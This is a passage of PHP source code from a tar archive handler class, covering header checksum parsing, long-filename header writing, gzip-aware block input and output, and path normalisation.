(strlen($binaryData) != 512){ $header['filename'] = ''; $this->__('Invalid block size').': '.strlen($binaryData); return false; } $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1)); $unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData); $header['checksum'] = OctDec(trim($unpack_data['checksum'])); if ($header['checksum'] != $checksum){ $header['filename'] = ''; if (($checksum == 256) && ($header['checksum'] == 0)) return true; $this->errors[] = __('Error checksum for file ').$unpack_data['filename']; return false; } if (($header['typeflag'] = $unpack_data['typeflag']) == '5') $header['size'] = 0; $header['filename'] = trim($unpack_data['filename']); $header['mode'] = OctDec(trim($unpack_data['mode'])); $header['user_id'] = OctDec(trim($unpack_data['user_id'])); $header['group_id'] = OctDec(trim($unpack_data['group_id'])); $header['size'] = OctDec(trim($unpack_data['size'])); $header['time'] = OctDec(trim($unpack_data['time'])); return true; } function writeHeader($filename, $keep_filename){ $packF = 'a100a8a8a8a12A12'; $packL = 'a1a100a6a2a32a32a8a8a155a12'; if (strlen($keep_filename)<=0) $keep_filename = $filename; $filename_ready = $this->makeGoodPath($keep_filename); if (strlen($filename_ready) > 99){ //write long header $dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0); $dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', ''); // Calculate the checksum $checksum = 0; // First part of the header for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); // Ignore the checksum value and replace it by ' ' (space) for ($i = 148; $i < 156; $i++) $checksum += ord(' '); // Last part of the header for ($i = 156, $j=0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); // Write the first 148 bytes of the header in the archive $this->writeBlock($dataFirst, 148); // Write the calculated checksum $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); // Write the last 356 bytes of the header in the archive $this->writeBlock($dataLast, 356); $tmp_filename = $this->makeGoodPath($filename_ready); $i = 0; while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){ $binaryData = pack('a512', $buffer); $this->writeBlock($binaryData); } return true; } $file_info = stat($filename); if (@is_dir($filename)){ $typeflag = '5'; $size = sprintf('%11s ', DecOct(0)); } else { $typeflag = ''; clearstatcache(); $size = sprintf('%11s ', DecOct(filesize($filename))); } $dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename)))); $dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', ''); $checksum = 0; for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1)); for ($i = 148; $i < 156; $i++) $checksum += ord(' '); for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1)); $this->writeBlock($dataFirst, 148); $checksum = sprintf('%6s ', DecOct($checksum)); $binaryData = pack('a8', $checksum); $this->writeBlock($binaryData, 8); $this->writeBlock($dataLast, 356); return true; } function openWrite(){ if ($this->isGzipped) $this->tmp_file = gzopen($this->archive_name, 'wb9f'); else $this->tmp_file = fopen($this->archive_name, 'wb'); if (!($this->tmp_file)){ $this->errors[] = __('Cannot write to file').' '.$this->archive_name; return false; } return true; } function readBlock(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) $block = gzread($this->tmp_file, 512); else $block = fread($this->tmp_file, 512); } else $block = ''; return $block; } function writeBlock($data, $length = 0){ if (is_resource($this->tmp_file)){ if ($length === 0){ if ($this->isGzipped) gzputs($this->tmp_file, $data); else fputs($this->tmp_file, $data); } else { if ($this->isGzipped) gzputs($this->tmp_file, $data, $length); else fputs($this->tmp_file, $data, $length); } } } function closeTmpFile(){ if (is_resource($this->tmp_file)){ if ($this->isGzipped) gzclose($this->tmp_file); else fclose($this->tmp_file); $this->tmp_file = 0; } } function makeGoodPath($path){ if (strlen($path)>0){ $path = str_replace('\\', '/', $path); $partPath = explode('/', $path); $els = count($partPath)-1; for ($i = $els; $i>=0; $i--){ if ($partPath[$i] == '.'){ // Ignore this directory } elseif ($partPath[$i] == '..'){ $i--; } elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){ } else $result = $partPath[$i].($i!=$els ? '/'.$result : ''); } } else $result = ''; return $result; } } ?>